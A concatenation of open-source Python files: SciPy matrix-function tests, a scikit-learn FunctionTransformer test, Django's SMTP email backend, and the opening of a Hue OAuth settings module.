A = _get_al_mohy_higham_2012_experiment_1() A_funm_log, info = funm(A, np.log, disp=False) A_round_trip = expm(A_funm_log) assert_(not np.allclose(A_round_trip, A, rtol=1e-5, atol=1e-14)) def test_round_trip_random_float(self): np.random.seed(1234) for n in range(1, 6): M_unscaled = np.random.randn(n, n) for scale in np.logspace(-4, 4, 9): M = M_unscaled * scale # Eigenvalues are related to the branch cut. W = np.linalg.eigvals(M) err_msg = 'M:{0} eivals:{1}'.format(M, W) # Check sqrtm round trip because it is used within logm. M_sqrtm, info = sqrtm(M, disp=False) M_sqrtm_round_trip = M_sqrtm.dot(M_sqrtm) assert_allclose(M_sqrtm_round_trip, M) # Check logm round trip. M_logm, info = logm(M, disp=False) M_logm_round_trip = expm(M_logm) assert_allclose(M_logm_round_trip, M, err_msg=err_msg) def test_round_trip_random_complex(self): np.random.seed(1234) for n in range(1, 6): M_unscaled = np.random.randn(n, n) + 1j * np.random.randn(n, n) for scale in np.logspace(-4, 4, 9): M = M_unscaled * scale M_logm, info = logm(M, disp=False) M_round_trip = expm(M_logm) assert_allclose(M_round_trip, M) def test_logm_type_preservation_and_conversion(self): # The logm matrix function should preserve the type of a matrix # whose eigenvalues are positive with zero imaginary part. # Test this preservation for variously structured matrices. complex_dtype_chars = ('F', 'D', 'G') for matrix_as_list in ( [[1, 0], [0, 1]], [[1, 0], [1, 1]], [[2, 1], [1, 1]], [[2, 3], [1, 2]]): # check that the spectrum has the expected properties W = scipy.linalg.eigvals(matrix_as_list) assert_(not any(w.imag or w.real < 0 for w in W)) # check float type preservation A = np.array(matrix_as_list, dtype=float) A_logm, info = logm(A, disp=False) assert_(A_logm.dtype.char not in complex_dtype_chars) # check complex type preservation A = np.array(matrix_as_list, dtype=complex) A_logm, info = logm(A, disp=False) assert_(A_logm.dtype.char in complex_dtype_chars) # check float->complex type conversion for the matrix negation A = -np.array(matrix_as_list, dtype=float) A_logm, info = logm(A, disp=False) assert_(A_logm.dtype.char in complex_dtype_chars) def test_complex_spectrum_real_logm(self): # This matrix has complex eigenvalues and real logm. # Its output dtype depends on its input dtype. M = [[1, 1, 2], [2, 1, 1], [1, 2, 1]] for dt in float, complex: X = np.array(M, dtype=dt) w = scipy.linalg.eigvals(X) assert_(1e-2 < np.absolute(w.imag).sum()) Y, info = logm(X, disp=False) assert_(np.issubdtype(Y.dtype, dt)) assert_allclose(expm(Y), X) def test_real_mixed_sign_spectrum(self): # These matrices have real eigenvalues with mixed signs. # The output logm dtype is complex, regardless of input dtype. 
for M in ( [[1, 0], [0, -1]], [[0, 1], [1, 0]]): for dt in float, complex: A = np.array(M, dtype=dt) A_logm, info = logm(A, disp=False) assert_(np.issubdtype(A_logm.dtype, complex)) def test_exactly_singular(self): A = np.array([[0, 0], [1j, 1j]]) B = np.asarray([[1, 1], [0, 0]]) for M in A, A.T, B, B.T: expected_warning = _matfuncs_inv_ssq.LogmExactlySingularWarning L, info = _assert_warns(expected_warning, logm, M, disp=False) E = expm(L) assert_allclose(E, M, atol=1e-14) def test_nearly_singular(self): M = np.array([[1e-100]]) expected_warning = _matfuncs_inv_ssq.LogmNearlySingularWarning L, info = _assert_warns(expected_warning, logm, M, disp=False) E = expm(L) assert_allclose(E, M, atol=1e-14) def test_opposite_sign_complex_eigenvalues(self): # See gh-6113 E = [[0, 1], [-1, 0]] L = [[0, np.pi*0.5], [-np.pi*0.5, 0]] assert_allclose(expm(L), E, atol=1e-14) assert_allclose(logm(E), L, atol=1e-14) E = [[1j, 4], [0, -1j]] L = [[1j*np.pi*0.5, 2*np.pi], [0, -1j*np.pi*0.5]] assert_allclose(expm(L), E, atol=1e-14) assert_allclose(logm(E), L, atol=1e-14) E = [[1j, 0], [0, -1j]] L = [[1j*np.pi*0.5, 0], [0, -1j*np.pi*0.5]] assert_allclose(expm(L), E, atol=1e-14) assert_allclose(logm(E), L, atol=1e-14) class TestSqrtM(TestCase): def test_round_trip_random_float(self): np.random.seed(1234) for n in range(1, 6): M_unscaled = np.random.randn(n, n) for scale in np.logspace(-4, 4, 9): M = M_unscaled * scale M_sqrtm, info = sqrtm(M, disp=False) M_sqrtm_round_trip = M_sqrtm.dot(M_sqrtm) assert_allclose(M_sqrtm_round_trip, M) def test_round_trip_random_complex(self): np.random.seed(1234) for n in range(1, 6): M_unscaled = np.random.randn(n, n) + 1j * np.random.randn(n, n) for scale in np.logspace(-4, 4, 9): M = M_unscaled * scale M_sqrtm, info = sqrtm(M, disp=False) M_sqrtm_round_trip = M_sqrtm.dot(M_sqrtm) assert_allclose(M_sqrtm_round_trip, M) def test_bad(self): # See http://www.maths.man.ac.uk/~nareports/narep336.ps.gz e = 2**-5 se = sqrt(e) a = array([[1.0,0,0,1], [0,e,0,0], [0,0,e,0], [0,0,0,1]]) sa = array([[1,0,0,0.5], [0,se,0,0], [0,0,se,0], [0,0,0,1]]) n = a.shape[0] assert_array_almost_equal(dot(sa,sa),a) # Check default sqrtm. esa = sqrtm(a, disp=False, blocksize=n)[0] assert_array_almost_equal(dot(esa,esa),a) # Check sqrtm with 2x2 blocks. esa = sqrtm(a, disp=False, blocksize=2)[0] assert_array_almost_equal(dot(esa,esa),a) def test_sqrtm_type_preservation_and_conversion(self): # The sqrtm matrix function should preserve the type of a matrix # whose eigenvalues are nonnegative with zero imaginary part. # Test this preservation for variously structured matrices. 
complex_dtype_chars = ('F', 'D', 'G') for matrix_as_list in ( [[1, 0], [0, 1]], [[1, 0], [1, 1]], [[2, 1], [1, 1]], [[2, 3], [1, 2]], [[1, 1], [1, 1]]): # check that the spectrum has the expected properties W = scipy.linalg.eigvals(matrix_as_list) assert_(not any(w.imag or w.real < 0 for w in W)) # check float type preservation A = np.array(matrix_as_list, dtype=float) A_sqrtm, info = sqrtm(A, disp=False) assert_(A_sqrtm.dtype.char not in complex_dtype_chars) # check complex type preservation A = np.array(matrix_as_list, dtype=complex) A_sqrtm, info = sqrtm(A, disp=False) assert_(A_sqrtm.dtype.char in complex_dtype_chars) # check float->complex type conversion for the matrix negation A = -np.array(matrix_as_list, dtype=float) A_sqrtm, info = sqrtm(A, disp=False) assert_(A_sqrtm.dtype.char in complex_dtype_chars) def test_sqrtm_type_conversion_mixed_sign_or_complex_spectrum(self): complex_dtype_chars = ('F', 'D', 'G') for matrix_as_list in ( [[1, 0], [0, -1]], [[0, 1], [1, 0]], [[0, 1, 0], [0, 0, 1], [1, 0, 0]]): # check that the spectrum has the expected properties W = scipy.linalg.eigvals(matrix_as_list) assert_(any(w.imag or w.real < 0 for w in W)) # check complex->complex A = np.array(matrix_as_list, dtype=complex) A_sqrtm, info = sqrtm(A, disp=False) assert_(A_sqrtm.dtype.char in complex_dtype_chars) # check float->complex A = np.array(matrix_as_list, dtype=float) A_sqrtm, info = sqrtm(A, disp=False) assert_(A_sqrtm.dtype.char in complex_dtype_chars) def test_blocksizes(self): # Make sure I do not goof up the blocksizes when they do not divide n. np.random.seed(1234) for n in range(1, 8): A = np.random.rand(n, n) + 1j*np.random.randn(n, n) A_sqrtm_default, info = sqrtm(A, disp=False, blocksize=n) assert_allclose(A, np.linalg.matrix_power(A_sqrtm_default, 2)) for blocksize in range(1, 10): A_sqrtm_new, info = sqrtm(A, disp=False, blocksize=blocksize) assert_allclose(A_sqrtm_default, A_sqrtm_new) def test_al_mohy_higham_2012_experiment_1(self): # Matrix square root of a tricky upper triangular matrix. A = _get_al_mohy_higham_2012_experiment_1() A_sqrtm, info = sqrtm(A, disp=False) A_round_trip = A_sqrtm.dot(A_sqrtm) assert_allclose(A_round_trip, A, rtol=1e-5) assert_allclose(np.tril(A_round_trip), np.tril(A)) def test_strict_upper_triangular(self): # This matrix has no square root. for dt in int, float: A = np.array([ [0, 3, 0, 0], [0, 0, 3, 0], [0, 0, 0, 3], [0, 0, 0, 0]], dtype=dt) A_sqrtm, info = sqrtm(A, disp=False) assert_(np.isnan(A_sqrtm).all()) def test_weird_matrix(self): # The square root of matrix B exists. for dt in int, float: A = np.array([ [0, 0, 1], [0, 0, 0], [0, 1, 0]], dtype=dt) B = np.array([ [0, 1, 0], [0, 0, 0], [0, 0, 0]], dtype=dt) assert_array_equal(B, A.dot(A)) # But scipy sqrtm is not clever enough to find it. 
B_sqrtm, info = sqrtm(B, disp=False) assert_(np.isnan(B_sqrtm).all()) def test_disp(self): from io import StringIO np.random.seed(1234) A = np.random.rand(3, 3) B = sqrtm(A, disp=True) assert_allclose(B.dot(B), A) def test_opposite_sign_complex_eigenvalues(self): M = [[2j, 4], [0, -2j]] R = [[1+1j, 2], [0, 1-1j]] assert_allclose(np.dot(R, R), M, atol=1e-14) assert_allclose(sqrtm(M), R, atol=1e-14) class TestFractionalMatrixPower(TestCase): def test_round_trip_random_complex(self): np.random.seed(1234) for p in range(1, 5): for n in range(1, 5): M_unscaled = np.random.randn(n, n) + 1j * np.random.randn(n, n) for scale in np.logspace(-4, 4, 9): M = M_unscaled * scale M_root = fractional_matrix_power(M, 1/p) M_round_trip = np.linalg.matrix_power(M_root, p) assert_allclose(M_round_trip, M) def test_round_trip_random_float(self): # This test is more annoying because it can hit the branch cut; # this happens when the matrix has an eigenvalue # with no imaginary component and with a real negative component, # and it means that the principal branch does not exist. np.random.seed(1234) for p in range(1, 5): for n in range(1, 5): M_unscaled = np.random.randn(n, n) for scale in np.logspace(-4, 4, 9): M = M_unscaled * scale M_root = fractional_matrix_power(M, 1/p) M_round_trip = np.linalg.matrix_power(M_root, p) assert_allclose(M_round_trip, M) def test_larger_abs_fractional_matrix_powers(self): np.random.seed(1234) for n in (2, 3, 5): for i in range(10): M = np.random.randn(n, n) + 1j * np.random.randn(n, n) M_one_fifth = fractional_matrix_power(M, 0.2) # Test the round trip. M_round_trip = np.linalg.matrix_power(M_one_fifth, 5) assert_allclose(M, M_round_trip) # Test a large abs fractional power. X = fractional_matrix_power(M, -5.4) Y = np.linalg.matrix_power(M_one_fifth, -27) assert_allclose(X, Y) # Test another large abs fractional power. X = fractional_matrix_power(M, 3.8) Y = np.linalg.matrix_power(M_one_fifth, 19) assert_allclose(X, Y) def test_random_matrices_and_powers(self): # Each independent iteration of this fuzz test picks random parameters. # It tries to hit some edge cases. np.random.seed(1234) nsamples = 20 for i in range(nsamples): # Sample a matrix size and a random real power. n = random.randrange(1, 5) p = np.random.randn() # Sample a random real or complex matrix. matrix_scale = np.exp(random.randrange(-4, 5)) A = np.random.randn(n, n) if random.choice((True, False)): A = A + 1j * np.random.randn(n, n) A = A * matrix_scale # Check a couple of analytically equivalent ways # to compute the fractional matrix power. # These can be compared because they both use the principal branch. A_power = fractional_matrix_power(A, p) A_logm, info = logm(A, disp=False) A_power_expm_logm = expm(A_logm * p) assert_allclose(A_power, A_power_expm_logm) def test_al_mohy_higham_2012_experiment_1(self): # Fractional powers of a tricky upper triangular matrix. A = _get_al_mohy_higham_2012_experiment_1() # Test remainder matrix power. A_funm_sqrt, info = funm(A, np.sqrt, disp=False) A_sqrtm, info = sqrtm(A, disp=False) A_rem_power = _matfuncs_inv_ssq._remainder_matrix_power(A, 0.5) A_power = fractional_matrix_power(A, 0.5) assert_array_equal(A_rem_power, A_power) assert_allclose(A_sqrtm, A_power) assert_allclose(A_sqrtm, A_funm_sqrt) # Test more fractional powers. 
for p in (1/2, 5/3): A_power = fractional_matrix_power(A, p) A_round_trip = fractional_matrix_power(A_power, 1/p) assert_allclose(A_round_trip, A, rtol=1e-2) assert_allclose(np.tril(A_round_trip, 1), np.tril(A, 1)) def test_briggs_helper_function(self): np.random.seed(1234) for a in np.random.randn(10) + 1j * np.random.randn(10): for k in range(5): x_observed = _matfuncs_inv_ssq._briggs_helper_function(a, k) x_expected = a ** np.exp2(-k) - 1 assert_allclose(x_observed, x_expected) def test_type_preservation_and_conversion(self): # The fractional_matrix_power matrix function should preserve # the type of a matrix whose eigenvalues # are positive with zero imaginary part. # Test this preservation for variously structured matrices. complex_dtype_chars = ('F', 'D', 'G') for matrix_as_list in ( [[1, 0], [0, 1]], [[1, 0], [1, 1]], [[2, 1], [1, 1]], [[2, 3], [1, 2]]): # check that the spectrum has the expected properties W = scipy.linalg.eigvals(matrix_as_list) assert_(not any(w.imag or w.real < 0 for w in W)) # Check various positive and negative powers # with absolute values bigger and smaller than 1. for p in (-2.4, -0.9, 0.2, 3.3): # check float type preservation A = np.array(matrix_as_list, dtype=float) A_power = fractional_matrix_power(A, p) assert_(A_power.dtype.char not in complex_dtype_chars) # check complex type preservation A = np.array(matrix_as_list, dtype=complex) A_power = fractional_matrix_power(A, p) assert_(A_power.dtype.char in complex_dtype_chars) # check float->complex for the matrix negation A = -np.array(matrix_as_list, dtype=float) A_power = fractional_matrix_power(A, p) assert_(A_power.dtype.char in complex_dtype_chars) def test_type_conversion_mixed_sign_or_complex_spectrum(self): complex_dtype_chars = ('F', 'D', 'G') for matrix_as_list in ( [[1, 0], [0, -1]], [[0, 1], [1, 0]], [[0, 1, 0], [0, 0, 1], [1, 0, 0]]): # check that the spectrum has the expected properties W = scipy.linalg.eigvals(matrix_as_list) assert_(any(w.imag or w.real < 0 for w in W)) # Check various positive and negative powers # with absolute values bigger and smaller than 1. for p in (-2.4, -0.9, 0.2, 3.3): # check complex->complex A = np.array(matrix_as_list, dtype=complex) A_power = fractional_matrix_power(A, p) assert_(A_power.dtype.char in complex_dtype_chars) # check float->complex A = np.array(matrix_as_list, dtype=float) A_power = fractional_matrix_power(A, p) assert_(A_power.dtype.char in complex_dtype_chars) @decorators.knownfailureif(True, 'Too unstable across LAPACKs.') def test_singular(self): # Negative fractional powers do not work with singular matrices. for matrix_as_list in ( [[0, 0], [0, 0]], [[1, 1], [1, 1]], [[1, 2], [3, 6]], [[0, 0, 0], [0, 1, 1], [0, -1, 1]]): # Check fractional powers both for float and for complex types. 
for newtype in (float, complex): A = np.array(matrix_as_list, dtype=newtype) for p in (-0.7, -0.9, -2.4, -1.3): A_power = fractional_matrix_power(A, p) assert_(np.isnan(A_power).all()) for p in (0.2, 1.43): A_power = fractional_matrix_power(A, p) A_round_trip = fractional_matrix_power(A_power, 1/p) assert_allclose(A_round_trip, A) def test_opposite_sign_complex_eigenvalues(self): M = [[2j, 4], [0, -2j]] R = [[1+1j, 2], [0, 1-1j]] assert_allclose(np.dot(R, R), M, atol=1e-14) assert_allclose(fractional_matrix_power(M, 0.5), R, atol=1e-14) class TestExpM(TestCase): def test_zero(self): with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) a = array([[0.,0],[0,0]]) assert_array_almost_equal(expm(a),[[1,0],[0,1]]) assert_array_almost_equal(expm2(a),[[1,0],[0,1]]) assert_array_almost_equal(expm3(a),[[1,0],[0,1]]) def test_consistency(self): with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) a = array([[0.,1],[-1,0]]) assert_array_almost_equal(expm(a), expm2(a)) assert_array_almost_equal(expm(a), expm3(a)) a = array([[1j,1],[-1,-2j]]) assert_array_almost_equal(expm(a), expm2(a)) assert_array_almost_equal(expm(a), expm3(a)) def test_npmatrix(self): with warnings.catch_warnings(): warnings.simplefilter("ignore", DeprecationWarning) a = matrix([[3.,0],[0,-3.]]) assert_array_almost_equal(expm(a), expm2(a)) def test_single_elt(self): # See gh-5853 from scipy.sparse import csc_matrix vOne = -2.02683397006j vTwo = -2.12817566856j mOne = csc_matrix([[vOne]], dtype='complex') mTwo = csc_matrix([[vTwo]], dtype='complex') outOne = expm(mOne) outTwo = expm(mTwo) assert_equal(type(outOne), type(mOne)) assert_equal(type(outTwo), type(mTwo)) assert_allclose(outOne[0, 0], complex(-0.44039415155949196, -0.8978045395698304)) assert_allclose(outTwo[0, 0], complex(-0.52896401032626006, -0.84864425749518878)) class TestExpmFrechet(TestCase): def test_expm_frechet(self): # a test of the basic functionality M = np.array([ [1, 2, 3, 4], [5, 6, 7, 8], [0, 0, 1, 2], [0, 0, 5, 6], ], dtype=float) A = np.array([ [1, 2], [5, 6], ], dtype=float) E = np.array([ [3, 4], [7, 8], ], dtype=float) expected_expm = scipy.linalg.expm(A) expected_frechet = scipy.linalg.expm(M)[:2, 2:] for kwargs in ({}, {'method':'SPS'}, {'method':'blockEnlarge'}): observed_expm, observed_frechet = expm_frechet(A, E, **kwargs) assert_allclose(expected_expm, observed_expm) assert_allclose(expected_frechet, observed_frechet) def test_small_norm_expm_frechet(self): # methodically test matrices with a range of norms, for better coverage M_original = np.array([ [1, 2, 3, 4], [5, 6, 7, 8], [0, 0, 1, 2], [0, 0, 5, 6], ], dtype=float) A_original = np.array([ [1, 2], [5, 6], ], dtype=float) E_original = np.array([ [3, 4], [7, 8], ], dtype=float) A_original_norm_1 = scipy.linalg.norm(A_original, 1) selected_m_list = [1, 3, 5, 7, 9, 11, 13, 15] m_neighbor_pairs = zip(selected_m_list[:-1], selected_m_list[1:]) for ma, mb in m_neighbor_pairs: ell_a = scipy.linalg._expm_frechet.ell_table_61[ma] ell_b = scipy.linalg._expm_frechet.ell_table_61[mb] target_norm_1 = 0.5 * (ell_a + ell_b) scale = target_norm_1 / A_original_norm_1 M = scale * M_original A = scale * A_original E = scale * E_original expected_expm = scipy.linalg.expm(A) expected_frechet = scipy.linalg.expm(M)[:2, 2:] observed_expm, observed_frechet = expm_frechet(A, E) assert_allclose(expected_expm, observed_expm) assert_allclose(expected_frechet, observed_frechet) def test_fuzz(self): # try a bunch of crazy inputs rfuncs = ( np.random.uniform, 
np.random.normal, np.random.standard_cauchy, np.random.exponential) ntests = 100 for i in range(ntests): rfunc = random.choice(rfuncs) target_norm_1 = random.expovariate(1.0) n = random.randrange(2, 16) A_original = rfunc(size=(n,n)) E_original = rfunc(size=(n,n)) A_original_norm_1 = scipy.linalg.norm(A_original, 1) scale = target_norm_1 / A_original_norm_1 A = scale * A_original E = scale * E_original M = np.vstack([ np.hstack([A, E]), np.hstack([np.zeros_like(A), A])]) expected_expm = scipy.linalg.expm(A) expected_frechet = scipy.linalg.expm(M)[:n, n:] observed_expm, observed_frechet = expm_frechet(A, E) assert_allclose(expected_expm, observed_expm) assert_allclose(expected_frechet, observed_frechet) def test_problematic_matrix(self): # this test case uncovered a bug which has since been fixed A = np.array([ [1.50591997, 1.93537998], [0.41203263, 0.23443516], ], dtype=float) E = np.array([ [1.87864034, 2.07055038], [1.34102727, 0.67341123], ], dtype=float) A_norm_1 = scipy.linalg.norm(A, 1) sps_expm, sps_frechet = expm_frechet( A, E, method='SPS') blockEnlarge_expm, blockEnlarge_frechet = expm_frechet( A, E, method='blockEnlarge') assert_allclose(sps_expm, blockEnlarge_expm) assert_allclose(sps_frechet, blockEnlarge_frechet) @decorators.slow @decorators.skipif(True, 'this test is deliberately slow') def test_medium_matrix(self): # profile this to see the speed difference n = 1000 A = np.random.exponential(size=(n, n)) E = np.random.exponential(size=(n, n)) sps_expm, sps_frechet = expm_frechet( A, E, method='SPS') blockEnlarge_expm, blockEnlarge_frechet = expm_frechet( A, E, method='blockEnlarge') assert_allclose(sps_expm, blockEnlarge_expm) assert_allclose(sps_frechet, blockEnlarge_frechet) def _help_expm_cond_search(A, A_norm, X, X_norm, eps, p): p = np.reshape(p, A.shape) p_norm = norm(p) perturbation = eps * p * (A_norm / p_norm) X_prime = expm(A + perturbation) scaled_relative_error = norm(X_prime - X) / (X_norm * eps) return -scaled_relative_error def _normalized_like(A, B): return A * (scipy.linalg.norm(B) / scipy.linalg.norm(A)) def _relative_error(f, A, perturbation): X = f(A) X_prime = f(A + perturbation) return norm(X_prime - X) / norm(X) class TestExpmConditionNumber(TestCase): def test_expm_cond_smoke(self): np.random.seed(1234) for n in range(1, 4): A = np.random.randn(n, n) kappa = expm_cond(A) assert_array_less(0, kappa) def test_expm_bad_condition_number(self): A = np.array([ [-1.128679820, 9.614183771e4, -4.524855739e9, 2.924969411e14], [0, -1.201010529, 9.634696872e4, -4.681048289e9], [0, 0, -1.132893222, 9.532491830e4], [0, 0, 0, -1.179475332], ]) kappa = expm_cond(A) assert_array_less(1e36, kappa) def test_univariate(self): np.random.seed(12345) for x in np.linspace(-5, 5, num=11): A = np.array([[x]]) assert_allclose(expm_cond(A), abs(x)) for x in np.logspace(-2, 2, num=11): A = np.array([[x]]) assert_allclose(expm_cond(A), abs(x)) for i in range(10): A = np.random.randn(1, 1) assert_allclose(expm_cond(A), np.absolute(A)[0, 0]) @decorators.slow def test_expm_cond_fuzz(self): np.random.seed(12345) eps = 1e-5 nsamples = 10 for i in range(nsamples): n = np.random.randint(2, 5) A = np.random.randn(n, n) A_norm = scipy.linalg.norm(A) X = expm(A) X_norm = scipy.linalg.norm(X) kappa = expm_cond(A) # Look for the small perturbation that gives the greatest # relative error. 
f = functools.partial(_help_expm_cond_search, A, A_norm, X, X_norm, eps) guess = np.ones(n*n) out = minimize(f, guess, method='L-BFGS-B') xopt = out.x yopt = f(xopt) p_best = eps * _normalized_like(np.reshape(xopt, A.shape), A) p_best_relerr = _relative_error(expm, A, p_best) assert_allclose(p_best_relerr, -yopt * eps) # Check that the identified perturbation indeed gives greater # relative error than random perturbations with similar norms. for j in range(5): p_rand = eps * _normalized_like(np.random.randn(*A.shape), A) assert_allclose(norm(p_best), norm(p_rand)) p_rand_relerr = _relative_error(expm, A, p_rand) assert_array_less(p_rand_relerr, p_best_relerr) # The greatest relative error should not be much greater than # eps times the condition number kappa. # In the limit as eps approaches zero it should never be greater. assert_array_less(p_best_relerr, (1 + 2*eps) * eps * kappa) if __name__ == "__main__": run_module_suite()
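
The fractional-power tests above lean on the identity A**p = expm(p * logm(A)) on the principal branch; a small standalone check of that relationship, using an arbitrary well-behaved example matrix, looks like this.

import numpy as np
from scipy.linalg import expm, logm, fractional_matrix_power, sqrtm

# Arbitrary symmetric positive definite matrix: its eigenvalues are positive,
# so the principal branch exists and all of these should agree.
A = np.array([[2.0, 1.0],
              [1.0, 3.0]])

p = 0.5
A_frac = fractional_matrix_power(A, p)
A_via_log = expm(p * logm(A))
A_sqrt = sqrtm(A)

np.testing.assert_allclose(A_frac, A_via_log, atol=1e-10)
np.testing.assert_allclose(A_frac, A_sqrt, atol=1e-10)

# Round trip: squaring the matrix square root recovers A.
np.testing.assert_allclose(A_sqrt.dot(A_sqrt), A, atol=1e-10)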
liangz0707/scikit-learn
refs/heads/master
sklearn/preprocessing/tests/test_function_transformer.py
176
from nose.tools import assert_equal
import numpy as np

from sklearn.preprocessing import FunctionTransformer


def _make_func(args_store, kwargs_store, func=lambda X, *a, **k: X):
    def _func(X, *args, **kwargs):
        args_store.append(X)
        args_store.extend(args)
        kwargs_store.update(kwargs)
        return func(X)

    return _func


def test_delegate_to_func():
    # (args|kwargs)_store will hold the positional and keyword arguments
    # passed to the function inside the FunctionTransformer.
    args_store = []
    kwargs_store = {}
    X = np.arange(10).reshape((5, 2))
    np.testing.assert_array_equal(
        FunctionTransformer(_make_func(args_store, kwargs_store)).transform(X),
        X,
        'transform should have returned X unchanged',
    )

    # The function should only have received X.
    assert_equal(
        args_store,
        [X],
        'Incorrect positional arguments passed to func: {args}'.format(
            args=args_store,
        ),
    )
    assert_equal(
        kwargs_store,
        {},
        'Unexpected keyword arguments passed to func: {args}'.format(
            args=kwargs_store,
        ),
    )

    # reset the argument stores.
    args_store[:] = []  # python2 compatible inplace list clear.
    kwargs_store.clear()
    y = object()

    np.testing.assert_array_equal(
        FunctionTransformer(
            _make_func(args_store, kwargs_store),
            pass_y=True,
        ).transform(X, y),
        X,
        'transform should have returned X unchanged',
    )

    # The function should have received X and y.
    assert_equal(
        args_store,
        [X, y],
        'Incorrect positional arguments passed to func: {args}'.format(
            args=args_store,
        ),
    )
    assert_equal(
        kwargs_store,
        {},
        'Unexpected keyword arguments passed to func: {args}'.format(
            args=kwargs_store,
        ),
    )


def test_np_log():
    X = np.arange(10).reshape((5, 2))

    # Test that the numpy.log example still works.
    np.testing.assert_array_equal(
        FunctionTransformer(np.log1p).transform(X),
        np.log1p(X),
    )
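
A short, self-contained example of FunctionTransformer used the way these tests exercise it, here as a preprocessing step inside a Pipeline; the data is made up.

import numpy as np
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import FunctionTransformer, StandardScaler

# Made-up non-negative data so log1p is well defined.
X = np.arange(10, dtype=float).reshape((5, 2))

# log1p as a stateless preprocessing step, followed by standard scaling.
pipeline = Pipeline([
    ('log', FunctionTransformer(np.log1p)),
    ('scale', StandardScaler()),
])

X_out = pipeline.fit_transform(X)
print(X_out.shape)  # (5, 2)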
WhySoGeeky/DroidPot
refs/heads/master
venv/lib/python2.7/site-packages/django/core/mail/backends/smtp.py
477
"""SMTP email backend class.""" import smtplib import ssl import threading from django.conf import settings from django.core.mail.backends.base import BaseEmailBackend from django.core.mail.message import sanitize_address from django.core.mail.utils import DNS_NAME class EmailBackend(BaseEmailBackend): """ A wrapper that manages the SMTP network connection. """ def __init__(self, host=None, port=None, username=None, password=None, use_tls=None, fail_silently=False, use_ssl=None, timeout=None, ssl_keyfile=None, ssl_certfile=None, **kwargs): super(EmailBackend, self).__init__(fail_silently=fail_silently) self.host = host or settings.EMAIL_HOST self.port = port or settings.EMAIL_PORT self.username = settings.EMAIL_HOST_USER if username is None else username self.password = settings.EMAIL_HOST_PASSWORD if password is None else password self.use_tls = settings.EMAIL_USE_TLS if use_tls is None else use_tls self.use_ssl = settings.EMAIL_USE_SSL if use_ssl is None else use_ssl self.timeout = settings.EMAIL_TIMEOUT if timeout is None else timeout self.ssl_keyfile = settings.EMAIL_SSL_KEYFILE if ssl_keyfile is None else ssl_keyfile self.ssl_certfile = settings.EMAIL_SSL_CERTFILE if ssl_certfile is None else ssl_certfile if self.use_ssl and self.use_tls: raise ValueError( "EMAIL_USE_TLS/EMAIL_USE_SSL are mutually exclusive, so only set " "one of those settings to True.") self.connection = None self._lock = threading.RLock() def open(self): """ Ensures we have a connection to the email server. Returns whether or not a new connection was required (True or False). """ if self.connection: # Nothing to do if the connection is already open. return False connection_class = smtplib.SMTP_SSL if self.use_ssl else smtplib.SMTP # If local_hostname is not specified, socket.getfqdn() gets used. # For performance, we use the cached FQDN for local_hostname. connection_params = {'local_hostname': DNS_NAME.get_fqdn()} if self.timeout is not None: connection_params['timeout'] = self.timeout if self.use_ssl: connection_params.update({ 'keyfile': self.ssl_keyfile, 'certfile': self.ssl_certfile, }) try: self.connection = connection_class(self.host, self.port, **connection_params) # TLS/SSL are mutually exclusive, so only attempt TLS over # non-secure connections. if not self.use_ssl and self.use_tls: self.connection.ehlo() self.connection.starttls(keyfile=self.ssl_keyfile, certfile=self.ssl_certfile) self.connection.ehlo() if self.username and self.password: self.connection.login(self.username, self.password) return True except smtplib.SMTPException: if not self.fail_silently: raise def close(self): """Closes the connection to the email server.""" if self.connection is None: return try: try: self.connection.quit() except (ssl.SSLError, smtplib.SMTPServerDisconnected): # This happens when calling quit() on a TLS connection # sometimes, or when the connection was already disconnected # by the server. self.connection.close() except smtplib.SMTPException: if self.fail_silently: return raise finally: self.connection = None def send_messages(self, email_messages): """ Sends one or more EmailMessage objects and returns the number of email messages sent. """ if not email_messages: return with self._lock: new_conn_created = self.open() if not self.connection: # We failed silently on open(). # Trying to send would be pointless. 
return num_sent = 0 for message in email_messages: sent = self._send(message) if sent: num_sent += 1 if new_conn_created: self.close() return num_sent def _send(self, email_message): """A helper method that does the actual sending.""" if not email_message.recipients(): return False from_email = sanitize_address(email_message.from_email, email_message.encoding) recipients = [sanitize_address(addr, email_message.encoding) for addr in email_message.recipients()] message = email_message.message() try: self.connection.sendmail(from_email, recipients, message.as_bytes(linesep='\r\n')) except smtplib.SMTPException: if not self.fail_silently: raise return False return True
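
A hedged sketch of driving this backend: normally one goes through django.core.mail.get_connection, which forwards keyword arguments to the backend constructor shown above. It assumes Django settings are configured, and the host, credentials, and addresses are placeholders.

# Illustrative only; host, credentials, and addresses are placeholders.
from django.core.mail import EmailMessage, get_connection

connection = get_connection(
    backend='django.core.mail.backends.smtp.EmailBackend',
    host='smtp.example.com',
    port=587,
    username='mailer',
    password='secret',
    use_tls=True,
    fail_silently=False,
)

message = EmailMessage(
    subject='Hello',
    body='Sent through the SMTP backend.',
    from_email='noreply@example.com',
    to=['someone@example.com'],
)

# send_messages() opens the connection, sends, and returns the number sent.
sent = connection.send_messages([message])
print(sent)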
lumig242/Hue-Integration-with-CDAP
refs/heads/pull3
desktop/libs/liboauth/src/liboauth/conf.py
35
#!/usr/bin/env python # Licensed to Cloudera, Inc. under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. Cloudera, Inc. licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os from django.utils.translation import ugettext_lazy as _t, ugettext as _ from desktop.lib.conf import Config, coerce_bool, coerce_csv, coerce_json_dict CONSUMER_KEY_TWITTER = Config( key="consumer_key_twitter", help=_t("The Consumer key of the twitter application."), type=str, default="" ) CONSUMER_KEY_GOOGLE = Config( key="consumer_key_google", help=_t("The Consumer key of the google application."), type=str, default="" ) CONSUMER_KEY_FACEBOOK = Config( key="consumer_key_facebook", help=_t("The Consumer key of the facebook application."), type=str, default="" ) CONSUMER_KEY_LINKEDIN = Config( key="consumer_key_linkedin", help=_t("The Consumer key of the linkedin application."), type=str, default="" ) CONSUMER_SECRET_TWITTER = Config( key="consumer_secret_twitter", help=_t("The Consumer secret of the twitter application."), type=str, default="" ) CONSUMER_SECRET_GOOGLE = Config( key="consumer_secret_google", help=_t("The Consumer secret of the google application."), type=str, default="" ) 